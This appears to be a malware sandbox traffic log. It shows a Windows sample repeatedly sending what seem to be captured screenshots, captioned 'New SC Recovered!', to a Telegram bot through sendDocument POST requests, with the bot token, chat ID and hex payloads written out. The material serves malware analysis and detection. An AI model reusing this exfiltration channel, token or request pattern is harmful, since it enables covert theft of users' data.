                                                Data Ascii: `%PQKI@(JJZ)J)i((K(QE%-P1)h^~VjV|Ez)hJ)hPQKEq(4\.&(;a1O{Q)\.C?jUeU,;UGfR]=C+zVcJ]uKM%aQw&Q$i*:J9PP5q,M-
                                                2024-07-25 22:02:41 UTC7419OUTData Raw: 31 dc 98 e5 84 7d e1 2b 1c 07 27 b8 3c 00 7b 63 1e e5 41 62 9b fc b6 db b0 c9 9c 8f ba 1b 69 3d 7d 78 aa 9f d9 96 bb 76 88 f1 f4 a5 5d 36 d9 18 30 0d 91 ef 5a d1 a5 52 94 79 53 47 3d 7a f4 6b cb 99 a6 5b 1c 8c d1 48 38 18 a2 ba cf 3c 5a 33 49 45 20 17 34 94 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 4c 02 8a 28 a0 61 45 14 94 80 5a 4a 28 a6 01 45 14 50 01 45 14 50 01 45 14 50 02 51 45 14 0c 28 a2 8a 00 4a 28 a2 80 0a 28 a2 81 85 14 52 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 00 29 28 a2 80 0a 28 a2 81 89 45 2d 25 00 14 51 49 40 05 14 51 40 c2 8a 29 28 00 a2 8a 28 18 52 52 d2 50 01 45 25 14 0c 28 a2 8a 00 29 28 a2 98 c2 8a 29 28 00 a2 8a 29 00 94 51 45 31 85 25 14 50 30 a4 a5 a4 a0 02 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28
                                                Data Ascii: 1}+'<{cAbi=}xv]60ZRySG=zk[H8<Z3IE 4Q@Q@Q@Q@QL(aEZJ(EPEPEPQE(J((RPEPEP0()((E-%QI@Q@)((RRPE%()()()QE1%P0(aIERRP0((
                                                2024-07-25 22:02:41 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 30 34 31 62 65 38 37 63 37 30 36 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dd0041be87c706--
                                                2024-07-25 22:02:41 UTC405INHTTP/1.1 401 Unauthorized
                                                Server: nginx/1.18.0
                                                Date: Thu, 25 Jul 2024 22:02:41 GMT
                                                Content-Type: application/json
                                                Content-Length: 58
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                21192.168.2.649750149.154.167.2204435020C:\Users\user\Desktop\LisectAVT_2403002A_127.exe
                                                TimestampBytes transferredDirectionData
                                                2024-07-25 22:02:49 UTC262OUTPOST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dd077b581d181a
                                                Host: api.telegram.org
                                                Content-Length: 57558
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-07-25 22:02:49 UTC25INHTTP/1.1 100 Continue
                                                2024-07-25 22:02:49 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 37 37 62 35 38 31 64 31 38 31 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 39 34 35 35 30 32 34 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 37 37 62 35 38 31 64 31 38 31 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 31 2f 31 38 2f 32 30 32 34 20 30 32 3a 34 37 3a 32 39 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dd077b581d181aContent-Disposition: form-data; name="chat_id"1394550246-----------------------------8dd077b581d181aContent-Disposition: form-data; name="caption"New SC Recovered!Time: 11/18/2024 02:47:29User
                                                2024-07-25 22:02:49 UTC16355OUTData Raw: 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c
                                                Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"
                                                2024-07-25 22:02:49 UTC16355OUTData Raw: 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 51 40 05 14 51 40 01 a2 8a 28 00 a2 8a 28 18 51 45 14 00 94 52 d2 50 01 45 14 50 01 45 14 53 01 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 b4 94 00 52 52 d1 4c 62 51 45 14 20 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 4a 06 14 51 45 00 14 51 45 30 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 61 49 8a 5a 29 80 94 51 45 00 14 51 45 00 14 51 45 03 0a 28 a2 80 0a 4a 5a 4a 60 14 1a 28 a0 02 8a 28 a6 01 49 4b 45 03 12 8a 29 69 80 94 51 45 00 25 14 b4 50 31 77 1f ad 21 0a 7a 8c 7d 28 a2 8b 08 69 8c 1f ba df 9d 34 a3 0e a2 9f 4a 09 1d 0d 16 2a ec 86 92 a7 24 1e a2 9a 51 4f 46 23 eb 40 f9 88 a8 a7 98 d8 76 cf d2 99 41 57 0f ce 8a 3a d2 d0 17 1b c5 18 a5 a4 a7 61 85 18 a3 14 51 60 1b 46 29 d4 94 58 77 1b
                                                Data Ascii: JZJ(QEQEQE%Q@Q@((QERPEPES(QEQEQE%RRLbQE ((JZJQEQE0JZ(((aIZ)QEQEQE(JZJ`((IKE)iQE%P1w!z}(i4J*$QOF#@vAW:aQ`F)Xw
                                                2024-07-25 22:02:49 UTC16355OUTData Raw: 8a 60 25 14 b4 50 02 51 4b 49 40 c2 8a 28 a0 02 93 14 b4 1a 00 4a 4a 5a 29 8c 4a 29 69 28 00 a2 8a 28 00 a4 a5 a2 98 09 4b 8a 28 a0 02 8c 51 45 00 25 2d 14 50 31 29 68 a2 98 85 5e a2 b4 ae bf d7 7e 03 f9 56 6a 8f 98 56 9d d7 fa e3 f4 1f ca b0 9f c4 81 7c 45 7a 29 68 a0 d4 4a 29 68 a0 04 a2 96 8c 50 02 51 4b 45 01 71 28 a5 c5 18 34 5c 2e 26 28 c5 3b 06 97 61 f4 a2 e2 b8 ca 31 4f d8 7b e0 51 f2 8e ac 29 5c 2e 43 3f 16 d2 ff 00 bb fd 6a ad 97 fa d6 fa 55 bb 92 9f 65 94 03 93 8f eb 55 2c b8 95 8e 3b 55 47 66 52 d8 bd 8a 5d a6 93 cd 3d 94 0a 43 2b 7a e3 f0 a9 d4 56 63 c2 1f 4a 5d 84 75 c0 a8 4b b1 ea 4d 25 16 61 ca c9 be 51 d5 c5 1b 90 77 26 a1 a2 9d 83 94 97 cc 51 fc 24 fd 69 0c be 8a 2a 3a 4a 39 50 f9 50 ff 00 35 fd 71 f4 a4 2c c7 ab 13 4d a2 9d 90 ec 2d 14
                                                Data Ascii: `%PQKI@(JJZ)J)i((K(QE%-P1)h^~VjV|Ez)hJ)hPQKEq(4\.&(;a1O{Q)\.C?jUeU,;UGfR]=C+zVcJ]uKM%aQw&Q$i*:J9PP5q,M-
                                                2024-07-25 22:02:49 UTC7419OUTData Raw: 31 dc 98 e5 84 7d e1 2b 1c 07 27 b8 3c 00 7b 63 1e e5 41 62 9b fc b6 db b0 c9 9c 8f ba 1b 69 3d 7d 78 aa 9f d9 96 bb 76 88 f1 f4 a5 5d 36 d9 18 30 0d 91 ef 5a d1 a5 52 94 79 53 47 3d 7a f4 6b cb 99 a6 5b 1c 8c d1 48 38 18 a2 ba cf 3c 5a 33 49 45 20 17 34 94 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 4c 02 8a 28 a0 61 45 14 94 80 5a 4a 28 a6 01 45 14 50 01 45 14 50 01 45 14 50 02 51 45 14 0c 28 a2 8a 00 4a 28 a2 80 0a 28 a2 81 85 14 52 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 00 29 28 a2 80 0a 28 a2 81 89 45 2d 25 00 14 51 49 40 05 14 51 40 c2 8a 29 28 00 a2 8a 28 18 52 52 d2 50 01 45 25 14 0c 28 a2 8a 00 29 28 a2 98 c2 8a 29 28 00 a2 8a 29 00 94 51 45 31 85 25 14 50 30 a4 a5 a4 a0 02 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28
                                                Data Ascii: 1}+'<{cAbi=}xv]60ZRySG=zk[H8<Z3IE 4Q@Q@Q@Q@QL(aEZJ(EPEPEPQE(J((RPEPEP0()((E-%QI@Q@)((RRPE%()()()QE1%P0(aIERRP0((
                                                2024-07-25 22:02:49 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 37 37 62 35 38 31 64 31 38 31 61 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dd077b581d181a--
                                                2024-07-25 22:02:50 UTC405INHTTP/1.1 401 Unauthorized
                                                Server: nginx/1.18.0
                                                Date: Thu, 25 Jul 2024 22:02:50 GMT
                                                Content-Type: application/json
                                                Content-Length: 58
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                22192.168.2.649751149.154.167.2204435020C:\Users\user\Desktop\LisectAVT_2403002A_127.exe
                                                TimestampBytes transferredDirectionData
                                                2024-07-25 22:02:59 UTC262OUTPOST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dd0c9d0c344755
                                                Host: api.telegram.org
                                                Content-Length: 57558
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-07-25 22:02:59 UTC25INHTTP/1.1 100 Continue
                                                2024-07-25 22:02:59 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 63 39 64 30 63 33 34 34 37 35 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 39 34 35 35 30 32 34 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 63 39 64 30 63 33 34 34 37 35 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 31 2f 32 34 2f 32 30 32 34 20 31 35 3a 33 31 3a 31 35 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dd0c9d0c344755Content-Disposition: form-data; name="chat_id"1394550246-----------------------------8dd0c9d0c344755Content-Disposition: form-data; name="caption"New SC Recovered!Time: 11/24/2024 15:31:15User
                                                2024-07-25 22:02:59 UTC16355OUTData Raw: 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c
                                                Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"
                                                2024-07-25 22:02:59 UTC16355OUTData Raw: 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 51 40 05 14 51 40 01 a2 8a 28 00 a2 8a 28 18 51 45 14 00 94 52 d2 50 01 45 14 50 01 45 14 53 01 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 b4 94 00 52 52 d1 4c 62 51 45 14 20 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 4a 06 14 51 45 00 14 51 45 30 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 61 49 8a 5a 29 80 94 51 45 00 14 51 45 00 14 51 45 03 0a 28 a2 80 0a 4a 5a 4a 60 14 1a 28 a0 02 8a 28 a6 01 49 4b 45 03 12 8a 29 69 80 94 51 45 00 25 14 b4 50 31 77 1f ad 21 0a 7a 8c 7d 28 a2 8b 08 69 8c 1f ba df 9d 34 a3 0e a2 9f 4a 09 1d 0d 16 2a ec 86 92 a7 24 1e a2 9a 51 4f 46 23 eb 40 f9 88 a8 a7 98 d8 76 cf d2 99 41 57 0f ce 8a 3a d2 d0 17 1b c5 18 a5 a4 a7 61 85 18 a3 14 51 60 1b 46 29 d4 94 58 77 1b
                                                Data Ascii: JZJ(QEQEQE%Q@Q@((QERPEPES(QEQEQE%RRLbQE ((JZJQEQE0JZ(((aIZ)QEQEQE(JZJ`((IKE)iQE%P1w!z}(i4J*$QOF#@vAW:aQ`F)Xw
                                                2024-07-25 22:02:59 UTC16355OUTData Raw: 8a 60 25 14 b4 50 02 51 4b 49 40 c2 8a 28 a0 02 93 14 b4 1a 00 4a 4a 5a 29 8c 4a 29 69 28 00 a2 8a 28 00 a4 a5 a2 98 09 4b 8a 28 a0 02 8c 51 45 00 25 2d 14 50 31 29 68 a2 98 85 5e a2 b4 ae bf d7 7e 03 f9 56 6a 8f 98 56 9d d7 fa e3 f4 1f ca b0 9f c4 81 7c 45 7a 29 68 a0 d4 4a 29 68 a0 04 a2 96 8c 50 02 51 4b 45 01 71 28 a5 c5 18 34 5c 2e 26 28 c5 3b 06 97 61 f4 a2 e2 b8 ca 31 4f d8 7b e0 51 f2 8e ac 29 5c 2e 43 3f 16 d2 ff 00 bb fd 6a ad 97 fa d6 fa 55 bb 92 9f 65 94 03 93 8f eb 55 2c b8 95 8e 3b 55 47 66 52 d8 bd 8a 5d a6 93 cd 3d 94 0a 43 2b 7a e3 f0 a9 d4 56 63 c2 1f 4a 5d 84 75 c0 a8 4b b1 ea 4d 25 16 61 ca c9 be 51 d5 c5 1b 90 77 26 a1 a2 9d 83 94 97 cc 51 fc 24 fd 69 0c be 8a 2a 3a 4a 39 50 f9 50 ff 00 35 fd 71 f4 a4 2c c7 ab 13 4d a2 9d 90 ec 2d 14
                                                Data Ascii: `%PQKI@(JJZ)J)i((K(QE%-P1)h^~VjV|Ez)hJ)hPQKEq(4\.&(;a1O{Q)\.C?jUeU,;UGfR]=C+zVcJ]uKM%aQw&Q$i*:J9PP5q,M-
                                                2024-07-25 22:02:59 UTC7419OUTData Raw: 31 dc 98 e5 84 7d e1 2b 1c 07 27 b8 3c 00 7b 63 1e e5 41 62 9b fc b6 db b0 c9 9c 8f ba 1b 69 3d 7d 78 aa 9f d9 96 bb 76 88 f1 f4 a5 5d 36 d9 18 30 0d 91 ef 5a d1 a5 52 94 79 53 47 3d 7a f4 6b cb 99 a6 5b 1c 8c d1 48 38 18 a2 ba cf 3c 5a 33 49 45 20 17 34 94 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 4c 02 8a 28 a0 61 45 14 94 80 5a 4a 28 a6 01 45 14 50 01 45 14 50 01 45 14 50 02 51 45 14 0c 28 a2 8a 00 4a 28 a2 80 0a 28 a2 81 85 14 52 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 00 29 28 a2 80 0a 28 a2 81 89 45 2d 25 00 14 51 49 40 05 14 51 40 c2 8a 29 28 00 a2 8a 28 18 52 52 d2 50 01 45 25 14 0c 28 a2 8a 00 29 28 a2 98 c2 8a 29 28 00 a2 8a 29 00 94 51 45 31 85 25 14 50 30 a4 a5 a4 a0 02 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28
                                                Data Ascii: 1}+'<{cAbi=}xv]60ZRySG=zk[H8<Z3IE 4Q@Q@Q@Q@QL(aEZJ(EPEPEPQE(J((RPEPEP0()((E-%QI@Q@)((RRPE%()()()QE1%P0(aIERRP0((
                                                2024-07-25 22:02:59 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 63 39 64 30 63 33 34 34 37 35 35 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dd0c9d0c344755--
                                                2024-07-25 22:02:59 UTC405INHTTP/1.1 401 Unauthorized
                                                Server: nginx/1.18.0
                                                Date: Thu, 25 Jul 2024 22:02:59 GMT
                                                Content-Type: application/json
                                                Content-Length: 58
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                23192.168.2.649752149.154.167.2204435020C:\Users\user\Desktop\LisectAVT_2403002A_127.exe
                                                TimestampBytes transferredDirectionData
                                                2024-07-25 22:03:04 UTC262OUTPOST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dd1001a144c656
                                                Host: api.telegram.org
                                                Content-Length: 57561
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-07-25 22:03:04 UTC25INHTTP/1.1 100 Continue
                                                2024-07-25 22:03:04 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 30 30 31 61 31 34 34 63 36 35 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 39 34 35 35 30 32 34 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 30 30 31 61 31 34 34 63 36 35 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 31 2f 32 38 2f 32 30 32 34 20 32 32 3a 34 38 3a 35 33 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dd1001a144c656Content-Disposition: form-data; name="chat_id"1394550246-----------------------------8dd1001a144c656Content-Disposition: form-data; name="caption"New SC Recovered!Time: 11/28/2024 22:48:53User
                                                2024-07-25 22:03:04 UTC16355OUTData Raw: 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c
                                                Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"
                                                2024-07-25 22:03:04 UTC16355OUTData Raw: 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 51 40 05 14 51 40 01 a2 8a 28 00 a2 8a 28 18 51 45 14 00 94 52 d2 50 01 45 14 50 01 45 14 53 01 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 b4 94 00 52 52 d1 4c 62 51 45 14 20 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 4a 06 14 51 45 00 14 51 45 30 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 61 49 8a 5a 29 80 94 51 45 00 14 51 45 00 14 51 45 03 0a 28 a2 80 0a 4a 5a 4a 60 14 1a 28 a0 02 8a 28 a6 01 49 4b 45 03 12 8a 29 69 80 94 51 45 00 25 14 b4 50 31 77 1f ad 21 0a 7a 8c 7d 28 a2 8b 08 69 8c 1f ba df 9d 34 a3 0e a2 9f 4a 09 1d 0d 16 2a ec 86 92 a7 24 1e a2 9a 51 4f 46 23 eb 40 f9 88 a8 a7 98 d8 76 cf d2 99 41 57 0f ce 8a 3a d2 d0 17 1b c5 18 a5 a4 a7 61 85 18 a3 14 51 60 1b 46 29 d4 94 58 77 1b
                                                Data Ascii: JZJ(QEQEQE%Q@Q@((QERPEPES(QEQEQE%RRLbQE ((JZJQEQE0JZ(((aIZ)QEQEQE(JZJ`((IKE)iQE%P1w!z}(i4J*$QOF#@vAW:aQ`F)Xw
                                                2024-07-25 22:03:04 UTC16355OUTData Raw: 8a 60 25 14 b4 50 02 51 4b 49 40 c2 8a 28 a0 02 93 14 b4 1a 00 4a 4a 5a 29 8c 4a 29 69 28 00 a2 8a 28 00 a4 a5 a2 98 09 4b 8a 28 a0 02 8c 51 45 00 25 2d 14 50 31 29 68 a2 98 85 5e a2 b4 ae bf d7 7e 03 f9 56 6a 8f 98 56 9d d7 fa e3 f4 1f ca b0 9f c4 81 7c 45 7a 29 68 a0 d4 4a 29 68 a0 04 a2 96 8c 50 02 51 4b 45 01 71 28 a5 c5 18 34 5c 2e 26 28 c5 3b 06 97 61 f4 a2 e2 b8 ca 31 4f d8 7b e0 51 f2 8e ac 29 5c 2e 43 3f 16 d2 ff 00 bb fd 6a ad 97 fa d6 fa 55 bb 92 9f 65 94 03 93 8f eb 55 2c b8 95 8e 3b 55 47 66 52 d8 bd 8a 5d a6 93 cd 3d 94 0a 43 2b 7a e3 f0 a9 d4 56 63 c2 1f 4a 5d 84 75 c0 a8 4b b1 ea 4d 25 16 61 ca c9 be 51 d5 c5 1b 90 77 26 a1 a2 9d 83 94 97 cc 51 fc 24 fd 69 0c be 8a 2a 3a 4a 39 50 f9 50 ff 00 35 fd 71 f4 a4 2c c7 ab 13 4d a2 9d 90 ec 2d 14
                                                Data Ascii: `%PQKI@(JJZ)J)i((K(QE%-P1)h^~VjV|Ez)hJ)hPQKEq(4\.&(;a1O{Q)\.C?jUeU,;UGfR]=C+zVcJ]uKM%aQw&Q$i*:J9PP5q,M-
                                                2024-07-25 22:03:04 UTC7422OUTData Raw: 31 dc 98 e5 84 7d e1 2b 1c 07 27 b8 3c 00 7b 63 1e e5 41 62 9b fc b6 db b0 c9 9c 8f ba 1b 69 3d 7d 78 aa 9f d9 96 bb 76 88 f1 f4 a5 5d 36 d9 18 30 0d 91 ef 5a d1 a5 52 94 79 53 47 3d 7a f4 6b cb 99 a6 5b 1c 8c d1 48 38 18 a2 ba cf 3c 5a 33 49 45 20 17 34 94 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 4c 02 8a 28 a0 61 45 14 94 80 5a 4a 28 a6 01 45 14 50 01 45 14 50 01 45 14 50 02 51 45 14 0c 28 a2 8a 00 4a 28 a2 80 0a 28 a2 81 85 14 52 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 00 29 28 a2 80 0a 28 a2 81 89 45 2d 25 00 14 51 49 40 05 14 51 40 c2 8a 29 28 00 a2 8a 28 18 52 52 d2 50 01 45 25 14 0c 28 a2 8a 00 29 28 a2 98 c2 8a 29 28 00 a2 8a 29 00 94 51 45 31 85 25 14 50 30 a4 a5 a4 a0 02 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28
                                                Data Ascii: 1}+'<{cAbi=}xv]60ZRySG=zk[H8<Z3IE 4Q@Q@Q@Q@QL(aEZJ(EPEPEPQE(J((RPEPEP0()((E-%QI@Q@)((RRPE%()()()QE1%P0(aIERRP0((
                                                2024-07-25 22:03:04 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 30 30 31 61 31 34 34 63 36 35 36 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dd1001a144c656--
                                                2024-07-25 22:03:04 UTC405INHTTP/1.1 401 Unauthorized
                                                Server: nginx/1.18.0
                                                Date: Thu, 25 Jul 2024 22:03:04 GMT
                                                Content-Type: application/json
                                                Content-Length: 58
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                24192.168.2.649753149.154.167.2204435020C:\Users\user\Desktop\LisectAVT_2403002A_127.exe
                                                TimestampBytes transferredDirectionData
